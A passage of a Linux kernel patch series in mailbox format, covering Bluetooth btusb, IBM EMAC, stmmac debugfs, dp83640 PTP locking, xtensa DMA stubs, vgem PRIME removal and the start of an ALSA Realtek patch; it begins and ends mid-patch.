Atr=01(Isoc) MxPS= 33 Ivl=1ms I: If#= 1 Alt= 5 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 49 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 49 Ivl=1ms Signed-off-by: Chan-yeol Park Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btusb.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index b9f282112153..c334620c07b3 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -2382,6 +2382,7 @@ struct qca_device_info { static const struct qca_device_info qca_devices_table[] = { { 0x00000100, 20, 4, 10 }, /* Rome 1.0 */ { 0x00000101, 20, 4, 10 }, /* Rome 1.1 */ + { 0x00000200, 28, 4, 18 }, /* Rome 2.0 */ { 0x00000201, 28, 4, 18 }, /* Rome 2.1 */ { 0x00000300, 28, 4, 18 }, /* Rome 3.0 */ { 0x00000302, 28, 4, 18 }, /* Rome 3.2 */ From 917a33379258c137324cb9204e2f2f6ed8dc2b78 Mon Sep 17 00:00:00 2001 From: Shailendra Verma Date: Mon, 25 May 2015 23:53:40 +0530 Subject: [PATCH 181/872] Bluetooth: btusb: Change 1 to true in bool type variable assignment The reset is a bool type variable. So assigning true to reset instead of 1. Signed-off-by: Shailendra Verma Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btusb.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index c334620c07b3..8ff0e162341d 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -38,7 +38,7 @@ static bool disable_scofix; static bool force_scofix; -static bool reset = 1; +static bool reset = true; static struct usb_driver btusb_driver; From bff6b89f86f5f4884e844300c5dc729b3d405681 Mon Sep 17 00:00:00 2001 From: Shailendra Verma Date: Tue, 26 May 2015 00:00:57 +0530 Subject: [PATCH 182/872] Bluetooth: hci_uart: Change 1 to true for bool type variables assignments The variables txcrc and hciextn are bool type. So assigning true instead of 1. Signed-off-by: Shailendra Verma Signed-off-by: Marcel Holtmann --- drivers/bluetooth/hci_bcsp.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/bluetooth/hci_bcsp.c b/drivers/bluetooth/hci_bcsp.c index dc8e3d4356a0..fc0056a28b81 100644 --- a/drivers/bluetooth/hci_bcsp.c +++ b/drivers/bluetooth/hci_bcsp.c @@ -47,8 +47,8 @@ #include "hci_uart.h" -static bool txcrc = 1; -static bool hciextn = 1; +static bool txcrc = true; +static bool hciextn = true; #define BCSP_TXWINSIZE 4 From 04b8c8143d46453a443ac32bfcd76ec952605765 Mon Sep 17 00:00:00 2001 From: Daniel Drake Date: Thu, 21 May 2015 08:23:50 -0600 Subject: [PATCH 183/872] Bluetooth: btusb: fix Realtek suspend/resume Realtek btusb devices don't currently work after suspend/resume because the updated firmware is quietly lost - the USB hub doesn't notice any status change upon resume, but some kind of reset has definitely happened as the LMP subversion has reverted to its original value. Set the reset_resume flag to trigger probe and upload the new firmware again. Like the vendor code, I assume this is not needed when the device is selected as a wakeup source and hence will retain power during suspend. On the 2 products I have to hand, when trying this configuration the hardware seems unable to keep the device powered up during suspend. The USB hub then detects a status change on resume and does a reset, so we do not end up in broken state. Signed-off-by: Daniel Drake Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btusb.c | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index 8ff0e162341d..a92811468542 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -328,6 +328,7 @@ static const struct usb_device_id blacklist_table[] = { #define BTUSB_FIRMWARE_LOADED 7 #define BTUSB_FIRMWARE_FAILED 8 #define BTUSB_BOOTING 9 +#define BTUSB_RESET_RESUME 10 struct btusb_data { struct hci_dev *hdev; @@ -2767,8 +2768,15 @@ static int btusb_probe(struct usb_interface *intf, } #ifdef CONFIG_BT_HCIBTUSB_RTL - if (id->driver_info & BTUSB_REALTEK) + if (id->driver_info & BTUSB_REALTEK) { hdev->setup = btrtl_setup_realtek; + + /* Realtek devices lose their updated firmware over suspend, + * but the USB hub doesn't notice any status change. + * Explicitly request a device reset on resume. + */ + set_bit(BTUSB_RESET_RESUME, &data->flags); + } #endif if (id->driver_info & BTUSB_AMP) { @@ -2901,6 +2909,14 @@ static int btusb_suspend(struct usb_interface *intf, pm_message_t message) btusb_stop_traffic(data); usb_kill_anchored_urbs(&data->tx_anchor); + /* Optionally request a device reset on resume, but only when + * wakeups are disabled. If wakeups are enabled we assume the + * device will stay powered up throughout suspend. + */ + if (test_bit(BTUSB_RESET_RESUME, &data->flags) && + !device_may_wakeup(&data->udev->dev)) + data->udev->reset_resume = 1; + return 0; } From 5369c71f7ca24f6472f8fa883e05fa7469fab284 Mon Sep 17 00:00:00 2001 From: Ivan Mikhaylov Date: Thu, 21 May 2015 19:11:02 +0400 Subject: [PATCH 184/872] net/ibm/emac: fix size of emac dump memory areas Fix in send of emac regs dump to ethtool which causing in wrong data interpretation on ethtool layer for MII and EMAC. Signed-off-by: Ivan Mikhaylov Signed-off-by: David S. Miller --- drivers/net/ethernet/ibm/emac/core.c | 16 ++++++---------- drivers/net/ethernet/ibm/emac/core.h | 7 ++----- 2 files changed, 8 insertions(+), 15 deletions(-) diff --git a/drivers/net/ethernet/ibm/emac/core.c b/drivers/net/ethernet/ibm/emac/core.c index de7919322190..b9df0cbd0a38 100644 --- a/drivers/net/ethernet/ibm/emac/core.c +++ b/drivers/net/ethernet/ibm/emac/core.c @@ -2084,12 +2084,8 @@ static void emac_ethtool_get_pauseparam(struct net_device *ndev, static int emac_get_regs_len(struct emac_instance *dev) { - if (emac_has_feature(dev, EMAC_FTR_EMAC4)) - return sizeof(struct emac_ethtool_regs_subhdr) + - EMAC4_ETHTOOL_REGS_SIZE(dev); - else return sizeof(struct emac_ethtool_regs_subhdr) + - EMAC_ETHTOOL_REGS_SIZE(dev); + sizeof(struct emac_regs); } static int emac_ethtool_get_regs_len(struct net_device *ndev) @@ -2114,15 +2110,15 @@ static void *emac_dump_regs(struct emac_instance *dev, void *buf) struct emac_ethtool_regs_subhdr *hdr = buf; hdr->index = dev->cell_index; - if (emac_has_feature(dev, EMAC_FTR_EMAC4)) { + if (emac_has_feature(dev, EMAC_FTR_EMAC4SYNC)) { + hdr->version = EMAC4SYNC_ETHTOOL_REGS_VER; + } else if (emac_has_feature(dev, EMAC_FTR_EMAC4)) { hdr->version = EMAC4_ETHTOOL_REGS_VER; - memcpy_fromio(hdr + 1, dev->emacp, EMAC4_ETHTOOL_REGS_SIZE(dev)); - return (void *)(hdr + 1) + EMAC4_ETHTOOL_REGS_SIZE(dev); } else { hdr->version = EMAC_ETHTOOL_REGS_VER; - memcpy_fromio(hdr + 1, dev->emacp, EMAC_ETHTOOL_REGS_SIZE(dev)); - return (void *)(hdr + 1) + EMAC_ETHTOOL_REGS_SIZE(dev); } + memcpy_fromio(hdr + 1, dev->emacp, sizeof(struct emac_regs)); + return (void *)(hdr + 1) + sizeof(struct emac_regs); } static void emac_ethtool_get_regs(struct net_device *ndev, diff --git a/drivers/net/ethernet/ibm/emac/core.h b/drivers/net/ethernet/ibm/emac/core.h index 67f342a9f65e..28df37420da9 100644 --- a/drivers/net/ethernet/ibm/emac/core.h +++ b/drivers/net/ethernet/ibm/emac/core.h @@ -461,10 +461,7 @@ struct emac_ethtool_regs_subhdr { }; #define EMAC_ETHTOOL_REGS_VER 0 -#define EMAC_ETHTOOL_REGS_SIZE(dev) ((dev)->rsrc_regs.end - \ - (dev)->rsrc_regs.start + 1) -#define EMAC4_ETHTOOL_REGS_VER 1 -#define EMAC4_ETHTOOL_REGS_SIZE(dev) ((dev)->rsrc_regs.end - \ - (dev)->rsrc_regs.start + 1) +#define EMAC4_ETHTOOL_REGS_VER 1 +#define EMAC4SYNC_ETHTOOL_REGS_VER 2 #endif /* __IBM_NEWEMAC_CORE_H */ From 466c5ac8bdf29a382d064923a60ef302dd3b2aeb Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Fri, 22 May 2015 19:03:29 -0700 Subject: [PATCH 185/872] net: stmmac: create one debugfs dir per net-device stmmac DebugFS entries are currently global to the driver. As a result, having more than one stmmac device in the system creates the following error: * ERROR stmmaceth, debugfs create directory failed * stmmac_hw_setup: failed debugFS registration This also results in being able to access the debugfs information for the first registered device only. This patch changes the debugfs structure to have one sub-directory per net-device. Files under "/sys/kernel/debug/stmmaceth" will now show-up under /sys/kernel/debug/stmmaceth/ethN/. Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- drivers/net/ethernet/stmicro/stmmac/stmmac.h | 6 ++ .../net/ethernet/stmicro/stmmac/stmmac_main.c | 76 +++++++++++++------ 2 files changed, 59 insertions(+), 23 deletions(-) diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac.h b/drivers/net/ethernet/stmicro/stmmac/stmmac.h index 2ac9552d1fa3..73bab983edd9 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac.h +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac.h @@ -117,6 +117,12 @@ struct stmmac_priv { int use_riwt; int irq_wake; spinlock_t ptp_lock; + +#ifdef CONFIG_DEBUG_FS + struct dentry *dbgfs_dir; + struct dentry *dbgfs_rings_status; + struct dentry *dbgfs_dma_cap; +#endif }; int stmmac_mdio_unregister(struct net_device *ndev); diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c index 05c146f718a3..2c5ce2baca87 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c @@ -118,7 +118,7 @@ static irqreturn_t stmmac_interrupt(int irq, void *dev_id); #ifdef CONFIG_DEBUG_FS static int stmmac_init_fs(struct net_device *dev); -static void stmmac_exit_fs(void); +static void stmmac_exit_fs(struct net_device *dev); #endif #define STMMAC_COAL_TIMER(x) (jiffies + usecs_to_jiffies(x)) @@ -1916,7 +1916,7 @@ static int stmmac_release(struct net_device *dev) netif_carrier_off(dev); #ifdef CONFIG_DEBUG_FS - stmmac_exit_fs(); + stmmac_exit_fs(dev); #endif stmmac_release_ptp(priv); @@ -2508,8 +2508,6 @@ static int stmmac_ioctl(struct net_device *dev, struct ifreq *rq, int cmd) #ifdef CONFIG_DEBUG_FS static struct dentry *stmmac_fs_dir; -static struct dentry *stmmac_rings_status; -static struct dentry *stmmac_dma_cap; static void sysfs_display_ring(void *head, int size, int extend_desc, struct seq_file *seq) @@ -2648,36 +2646,39 @@ static const struct file_operations stmmac_dma_cap_fops = { static int stmmac_init_fs(struct net_device *dev) { - /* Create debugfs entries */ - stmmac_fs_dir = debugfs_create_dir(STMMAC_RESOURCE_NAME, NULL); + struct stmmac_priv *priv = netdev_priv(dev); + + /* Create per netdev entries */ + priv->dbgfs_dir = debugfs_create_dir(dev->name, stmmac_fs_dir); - if (!stmmac_fs_dir || IS_ERR(stmmac_fs_dir)) { - pr_err("ERROR %s, debugfs create directory failed\n", - STMMAC_RESOURCE_NAME); + if (!priv->dbgfs_dir || IS_ERR(priv->dbgfs_dir)) { + pr_err("ERROR %s/%s, debugfs create directory failed\n", + STMMAC_RESOURCE_NAME, dev->name); return -ENOMEM; } /* Entry to report DMA RX/TX rings */ - stmmac_rings_status = debugfs_create_file("descriptors_status", - S_IRUGO, stmmac_fs_dir, dev, - &stmmac_rings_status_fops); + priv->dbgfs_rings_status = + debugfs_create_file("descriptors_status", S_IRUGO, + priv->dbgfs_dir, dev, + &stmmac_rings_status_fops); - if (!stmmac_rings_status || IS_ERR(stmmac_rings_status)) { + if (!priv->dbgfs_rings_status || IS_ERR(priv->dbgfs_rings_status)) { pr_info("ERROR creating stmmac ring debugfs file\n"); - debugfs_remove(stmmac_fs_dir); + debugfs_remove_recursive(priv->dbgfs_dir); return -ENOMEM; } /* Entry to report the DMA HW features */ - stmmac_dma_cap = debugfs_create_file("dma_cap", S_IRUGO, stmmac_fs_dir, - dev, &stmmac_dma_cap_fops); + priv->dbgfs_dma_cap = debugfs_create_file("dma_cap", S_IRUGO, + priv->dbgfs_dir, + dev, &stmmac_dma_cap_fops); - if (!stmmac_dma_cap || IS_ERR(stmmac_dma_cap)) { + if (!priv->dbgfs_dma_cap || IS_ERR(priv->dbgfs_dma_cap)) { pr_info("ERROR creating stmmac MMC debugfs file\n"); - debugfs_remove(stmmac_rings_status); - debugfs_remove(stmmac_fs_dir); + debugfs_remove_recursive(priv->dbgfs_dir); return -ENOMEM; } @@ -2685,11 +2686,11 @@ static int stmmac_init_fs(struct net_device *dev) return 0; } -static void stmmac_exit_fs(void) +static void stmmac_exit_fs(struct net_device *dev) { - debugfs_remove(stmmac_rings_status); - debugfs_remove(stmmac_dma_cap); - debugfs_remove(stmmac_fs_dir); + struct stmmac_priv *priv = netdev_priv(dev); + + debugfs_remove_recursive(priv->dbgfs_dir); } #endif /* CONFIG_DEBUG_FS */ @@ -3149,6 +3150,35 @@ static int __init stmmac_cmdline_opt(char *str) __setup("stmmaceth=", stmmac_cmdline_opt); #endif /* MODULE */ +static int __init stmmac_init(void) +{ +#ifdef CONFIG_DEBUG_FS + /* Create debugfs main directory if it doesn't exist yet */ + if (!stmmac_fs_dir) { + stmmac_fs_dir = debugfs_create_dir(STMMAC_RESOURCE_NAME, NULL); + + if (!stmmac_fs_dir || IS_ERR(stmmac_fs_dir)) { + pr_err("ERROR %s, debugfs create directory failed\n", + STMMAC_RESOURCE_NAME); + + return -ENOMEM; + } + } +#endif + + return 0; +} + +static void __exit stmmac_exit(void) +{ +#ifdef CONFIG_DEBUG_FS + debugfs_remove_recursive(stmmac_fs_dir); +#endif +} + +module_init(stmmac_init) +module_exit(stmmac_exit) + MODULE_DESCRIPTION("STMMAC 10/100/1000 Ethernet device driver"); MODULE_AUTHOR("Giuseppe Cavallaro "); MODULE_LICENSE("GPL"); From 397a253af5031de4a4612210055935309af4472c Mon Sep 17 00:00:00 2001 From: Richard Cochran Date: Mon, 25 May 2015 11:55:43 +0200 Subject: [PATCH 186/872] net: dp83640: fix broken calibration routine. Currently, the calibration function that corrects the initial offsets among multiple devices only works the first time. If the function is called more than once, the calibration fails and bogus offsets will be programmed into the devices. In a well hidden spot, the device documentation tells that trigger indexes 0 and 1 are special in allowing the TRIG_IF_LATE flag to actually work. This patch fixes the issue by using one of the special triggers during the recalibration method. Signed-off-by: Richard Cochran Signed-off-by: David S. Miller --- drivers/net/phy/dp83640.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/phy/dp83640.c b/drivers/net/phy/dp83640.c index 496e02f961d3..7a068d99ea46 100644 --- a/drivers/net/phy/dp83640.c +++ b/drivers/net/phy/dp83640.c @@ -47,7 +47,7 @@ #define PSF_TX 0x1000 #define EXT_EVENT 1 #define CAL_EVENT 7 -#define CAL_TRIGGER 7 +#define CAL_TRIGGER 1 #define DP83640_N_PINS 12 #define MII_DP83640_MICR 0x11 From a935865c828c8cd20501f618c69f659a5b6d6a5f Mon Sep 17 00:00:00 2001 From: Richard Cochran Date: Mon, 25 May 2015 11:55:44 +0200 Subject: [PATCH 187/872] net: dp83640: reinforce locking rules. Callers of the ext_write function are supposed to hold a mutex that protects the state of the dialed page, but one caller was missing the lock from the very start, and over time the code has been changed without following the rule. This patch cleans up the call sites in violation of the rule. Signed-off-by: Richard Cochran Signed-off-by: David S. Miller --- drivers/net/phy/dp83640.c | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/drivers/net/phy/dp83640.c b/drivers/net/phy/dp83640.c index 7a068d99ea46..e570036275e2 100644 --- a/drivers/net/phy/dp83640.c +++ b/drivers/net/phy/dp83640.c @@ -496,7 +496,9 @@ static int ptp_dp83640_enable(struct ptp_clock_info *ptp, else evnt |= EVNT_RISE; } + mutex_lock(&clock->extreg_lock); ext_write(0, phydev, PAGE5, PTP_EVNT, evnt); + mutex_unlock(&clock->extreg_lock); return 0; case PTP_CLK_REQ_PEROUT: @@ -532,6 +534,8 @@ static u8 status_frame_src[6] = { 0x08, 0x00, 0x17, 0x0B, 0x6B, 0x0F }; static void enable_status_frames(struct phy_device *phydev, bool on) { + struct dp83640_private *dp83640 = phydev->priv; + struct dp83640_clock *clock = dp83640->clock; u16 cfg0 = 0, ver; if (on) @@ -539,9 +543,13 @@ static void enable_status_frames(struct phy_device *phydev, bool on) ver = (PSF_PTPVER & VERSIONPTP_MASK) << VERSIONPTP_SHIFT; + mutex_lock(&clock->extreg_lock); + ext_write(0, phydev, PAGE5, PSF_CFG0, cfg0); ext_write(0, phydev, PAGE6, PSF_CFG1, ver); + mutex_unlock(&clock->extreg_lock); + if (!phydev->attached_dev) { pr_warn("expected to find an attached netdevice\n"); return; @@ -1173,11 +1181,18 @@ static int dp83640_config_init(struct phy_device *phydev) if (clock->chosen && !list_empty(&clock->phylist)) recalibrate(clock); - else + else { + mutex_lock(&clock->extreg_lock); enable_broadcast(phydev, clock->page, 1); + mutex_unlock(&clock->extreg_lock); + } enable_status_frames(phydev, true); + + mutex_lock(&clock->extreg_lock); ext_write(0, phydev, PAGE4, PTP_CTL, PTP_ENABLE); + mutex_unlock(&clock->extreg_lock); + return 0; } From adbe088f6f8b0b7701fe07f51fe6f2bd602a6665 Mon Sep 17 00:00:00 2001 From: Richard Cochran Date: Mon, 25 May 2015 11:55:45 +0200 Subject: [PATCH 188/872] net: dp83640: fix improper double spin locking. A pair of nested spin locks was introduced in commit 63502b8d0 "dp83640: Fix receive timestamp race condition". Unfortunately the 'flags' parameter was reused for the inner lock, clobbering the originally saved IRQ state. This patch fixes the issue by changing the inner lock to plain spin_lock without irqsave. Signed-off-by: Richard Cochran Signed-off-by: David S. Miller --- drivers/net/phy/dp83640.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/phy/dp83640.c b/drivers/net/phy/dp83640.c index e570036275e2..00cb41e71312 100644 --- a/drivers/net/phy/dp83640.c +++ b/drivers/net/phy/dp83640.c @@ -846,7 +846,7 @@ static void decode_rxts(struct dp83640_private *dp83640, list_del_init(&rxts->list); phy2rxts(phy_rxts, rxts); - spin_lock_irqsave(&dp83640->rx_queue.lock, flags); + spin_lock(&dp83640->rx_queue.lock); skb_queue_walk(&dp83640->rx_queue, skb) { struct dp83640_skb_info *skb_info; @@ -861,7 +861,7 @@ static void decode_rxts(struct dp83640_private *dp83640, break; } } - spin_unlock_irqrestore(&dp83640->rx_queue.lock, flags); + spin_unlock(&dp83640->rx_queue.lock); if (!shhwtstamps) list_add_tail(&rxts->list, &dp83640->rxts); From e74993aef4411995960052506a000f94411a7103 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Mon, 4 May 2015 15:30:47 -0700 Subject: [PATCH 189/872] xtensa: Provide dummy dma_alloc_attrs() and dma_free_attrs() MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit xtensa:allmodconfig fails to build with the following errors. drivers/gpu/drm/nouveau/nvkm/subdev/instmem/gk20a.c: In function ‘gk20a_instobj_dtor_dma’: drivers/gpu/drm/nouveau/nvkm/subdev/instmem/gk20a.c:154:2: error: implicit declaration of function ‘dma_free_attrs’ drivers/gpu/drm/nouveau/nvkm/subdev/instmem/gk20a.c: In function ‘gk20a_instobj_ctor_dma’: drivers/gpu/drm/nouveau/nvkm/subdev/instmem/gk20a.c:218:2: error: implicit declaration of function ‘dma_alloc_attrs’ Xtensa does not provide those functions at this time. Provide dummy implementations to avoid build errors. Acked-by: Max Filippov Signed-off-by: Guenter Roeck Signed-off-by: Chris Zankel --- arch/xtensa/include/asm/dma-mapping.h | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/arch/xtensa/include/asm/dma-mapping.h b/arch/xtensa/include/asm/dma-mapping.h index 172a02a6ad14..ba78ccf651e7 100644 --- a/arch/xtensa/include/asm/dma-mapping.h +++ b/arch/xtensa/include/asm/dma-mapping.h @@ -185,4 +185,17 @@ static inline int dma_get_sgtable(struct device *dev, struct sg_table *sgt, return -EINVAL; } +static inline void *dma_alloc_attrs(struct device *dev, size_t size, + dma_addr_t *dma_handle, gfp_t flag, + struct dma_attrs *attrs) +{ + return NULL; +} + +static inline void dma_free_attrs(struct device *dev, size_t size, + void *vaddr, dma_addr_t dma_handle, + struct dma_attrs *attrs) +{ +} + #endif /* _XTENSA_DMA_MAPPING_H */ From f72186d22aad44100e2dd17ccdcf13c4418ec3cb Mon Sep 17 00:00:00 2001 From: Florian Grandel Date: Tue, 26 May 2015 03:31:09 +0200 Subject: [PATCH 190/872] Bluetooth: mgmt: fix typos A few comments had minor typos. These are being fixed. Signed-off-by: Florian Grandel Signed-off-by: Marcel Holtmann --- net/bluetooth/mgmt.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c index 7fd87e7135b5..a6f21f8c2f98 100644 --- a/net/bluetooth/mgmt.c +++ b/net/bluetooth/mgmt.c @@ -7577,7 +7577,7 @@ void mgmt_new_ltk(struct hci_dev *hdev, struct smp_ltk *key, bool persistent) memset(&ev, 0, sizeof(ev)); /* Devices using resolvable or non-resolvable random addresses - * without providing an indentity resolving key don't require + * without providing an identity resolving key don't require * to store long term keys. Their addresses will change the * next time around. * @@ -7617,7 +7617,7 @@ void mgmt_new_irk(struct hci_dev *hdev, struct smp_irk *irk) /* For identity resolving keys from devices that are already * using a public address or static random address, do not * ask for storing this key. The identity resolving key really - * is only mandatory for devices using resovlable random + * is only mandatory for devices using resolvable random * addresses. * * Storing all identity resolving keys has the downside that @@ -7646,7 +7646,7 @@ void mgmt_new_csrk(struct hci_dev *hdev, struct smp_csrk *csrk, memset(&ev, 0, sizeof(ev)); /* Devices using resolvable or non-resolvable random addresses - * without providing an indentity resolving key don't require + * without providing an identity resolving key don't require * to store signature resolving keys. Their addresses will change * the next time around. * From 990ed2720717173bbdea4cfb2bad37cc7aa91495 Mon Sep 17 00:00:00 2001 From: Rob Clark Date: Thu, 21 May 2015 11:58:30 -0400 Subject: [PATCH 191/872] drm/vgem: drop DRIVER_PRIME (v2) For actual sharing of buffers with other drivers (ie. actual hardware) we'll need to pimp things out a bit better to deal w/ caching, multiple memory domains, etc. See thread: http://lists.freedesktop.org/archives/dri-devel/2015-May/083160.html But for the llvmpipe use-case this isn't a problem. Nor do we really need prime/dri3 (dri2 is sufficient). So until the other issues are sorted lets remove DRIVER_PRIME. v2: also drop the dead code [airlied: Okay I'm convinced this API could have a lot of use cases that are really really bad, yes the upload use case is valid however that isn't the only use case enabled, and if we allow all the other use cases, people will start to (ab)use them, and then they'll be ABI and my life will get worse, so disable PRIME for now] Acked-by: Thomas Hellstrom Acked-by: Daniel Vetter Signed-off-by: Rob Clark Signed-off-by: Dave Airlie --- drivers/gpu/drm/vgem/Makefile | 2 +- drivers/gpu/drm/vgem/vgem_dma_buf.c | 94 ----------------------------- drivers/gpu/drm/vgem/vgem_drv.c | 11 +--- drivers/gpu/drm/vgem/vgem_drv.h | 11 ---- 4 files changed, 2 insertions(+), 116 deletions(-) delete mode 100644 drivers/gpu/drm/vgem/vgem_dma_buf.c diff --git a/drivers/gpu/drm/vgem/Makefile b/drivers/gpu/drm/vgem/Makefile index 1055cb79096c..3f4c7b842028 100644 --- a/drivers/gpu/drm/vgem/Makefile +++ b/drivers/gpu/drm/vgem/Makefile @@ -1,4 +1,4 @@ ccflags-y := -Iinclude/drm -vgem-y := vgem_drv.o vgem_dma_buf.o +vgem-y := vgem_drv.o obj-$(CONFIG_DRM_VGEM) += vgem.o diff --git a/drivers/gpu/drm/vgem/vgem_dma_buf.c b/drivers/gpu/drm/vgem/vgem_dma_buf.c deleted file mode 100644 index 0254438ad1a6..000000000000 --- a/drivers/gpu/drm/vgem/vgem_dma_buf.c +++ /dev/null @@ -1,94 +0,0 @@ -/* - * Copyright © 2012 Intel Corporation - * Copyright © 2014 The Chromium OS Authors - * - * Permission is hereby granted, free of charge, to any person obtaining a - * copy of this software and associated documentation files (the "Software"), - * to deal in the Software without restriction, including without limitation - * the rights to use, copy, modify, merge, publish, distribute, sublicense, - * and/or sell copies of the Software, and to permit persons to whom the - * Software is furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice (including the next - * paragraph) shall be included in all copies or substantial portions of the - * Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL - * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - * IN THE SOFTWARE. - * - * Authors: - * Ben Widawsky - * - */ - -#include -#include "vgem_drv.h" - -struct sg_table *vgem_gem_prime_get_sg_table(struct drm_gem_object *gobj) -{ - struct drm_vgem_gem_object *obj = to_vgem_bo(gobj); - BUG_ON(obj->pages == NULL); - - return drm_prime_pages_to_sg(obj->pages, obj->base.size / PAGE_SIZE); -} - -int vgem_gem_prime_pin(struct drm_gem_object *gobj) -{ - struct drm_vgem_gem_object *obj = to_vgem_bo(gobj); - return vgem_gem_get_pages(obj); -} - -void vgem_gem_prime_unpin(struct drm_gem_object *gobj) -{ - struct drm_vgem_gem_object *obj = to_vgem_bo(gobj); - vgem_gem_put_pages(obj); -} - -void *vgem_gem_prime_vmap(struct drm_gem_object *gobj) -{ - struct drm_vgem_gem_object *obj = to_vgem_bo(gobj); - BUG_ON(obj->pages == NULL); - - return vmap(obj->pages, obj->base.size / PAGE_SIZE, 0, PAGE_KERNEL); -} - -void vgem_gem_prime_vunmap(struct drm_gem_object *obj, void *vaddr) -{ - vunmap(vaddr); -} - -struct drm_gem_object *vgem_gem_prime_import(struct drm_device *dev, - struct dma_buf *dma_buf) -{ - struct drm_vgem_gem_object *obj = NULL; - int ret; - - obj = kzalloc(sizeof(*obj), GFP_KERNEL); - if (obj == NULL) { - ret = -ENOMEM; - goto fail; - } - - ret = drm_gem_object_init(dev, &obj->base, dma_buf->size); - if (ret) { - ret = -ENOMEM; - goto fail_free; - } - - get_dma_buf(dma_buf); - - obj->base.dma_buf = dma_buf; - obj->use_dma_buf = true; - - return &obj->base; - -fail_free: - kfree(obj); -fail: - return ERR_PTR(ret); -} diff --git a/drivers/gpu/drm/vgem/vgem_drv.c b/drivers/gpu/drm/vgem/vgem_drv.c index cb3b43525b2d..7a207ca547be 100644 --- a/drivers/gpu/drm/vgem/vgem_drv.c +++ b/drivers/gpu/drm/vgem/vgem_drv.c @@ -302,22 +302,13 @@ static const struct file_operations vgem_driver_fops = { }; static struct drm_driver vgem_driver = { - .driver_features = DRIVER_GEM | DRIVER_PRIME, + .driver_features = DRIVER_GEM, .gem_free_object = vgem_gem_free_object, .gem_vm_ops = &vgem_gem_vm_ops, .ioctls = vgem_ioctls, .fops = &vgem_driver_fops, .dumb_create = vgem_gem_dumb_create, .dumb_map_offset = vgem_gem_dumb_map, - .prime_handle_to_fd = drm_gem_prime_handle_to_fd, - .prime_fd_to_handle = drm_gem_prime_fd_to_handle, - .gem_prime_export = drm_gem_prime_export, - .gem_prime_import = vgem_gem_prime_import, - .gem_prime_pin = vgem_gem_prime_pin, - .gem_prime_unpin = vgem_gem_prime_unpin, - .gem_prime_get_sg_table = vgem_gem_prime_get_sg_table, - .gem_prime_vmap = vgem_gem_prime_vmap, - .gem_prime_vunmap = vgem_gem_prime_vunmap, .name = DRIVER_NAME, .desc = DRIVER_DESC, .date = DRIVER_DATE, diff --git a/drivers/gpu/drm/vgem/vgem_drv.h b/drivers/gpu/drm/vgem/vgem_drv.h index 57ab4d8f41f9..e9f92f7ee275 100644 --- a/drivers/gpu/drm/vgem/vgem_drv.h +++ b/drivers/gpu/drm/vgem/vgem_drv.h @@ -43,15 +43,4 @@ struct drm_vgem_gem_object { extern void vgem_gem_put_pages(struct drm_vgem_gem_object *obj); extern int vgem_gem_get_pages(struct drm_vgem_gem_object *obj); -/* vgem_dma_buf.c */ -extern struct sg_table *vgem_gem_prime_get_sg_table( - struct drm_gem_object *gobj); -extern int vgem_gem_prime_pin(struct drm_gem_object *gobj); -extern void vgem_gem_prime_unpin(struct drm_gem_object *gobj); -extern void *vgem_gem_prime_vmap(struct drm_gem_object *gobj); -extern void vgem_gem_prime_vunmap(struct drm_gem_object *obj, void *vaddr); -extern struct drm_gem_object *vgem_gem_prime_import(struct drm_device *dev, - struct dma_buf *dma_buf); - - #endif From 823245026ead28a244cb9df5ae79b511da128606 Mon Sep 17 00:00:00 2001 From: Kailang Yang Date: Mon, 25 May 2015 17:16:49 +0800 Subject: [PATCH 192/872] ALSA: hda/realtek - Add ALC256 alias name for Dell Add ALC3246 for Dell platform. Signed-off-by: Kailang Yang Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 31f8f13be907..fc0ccc78bdc7 100644 --- 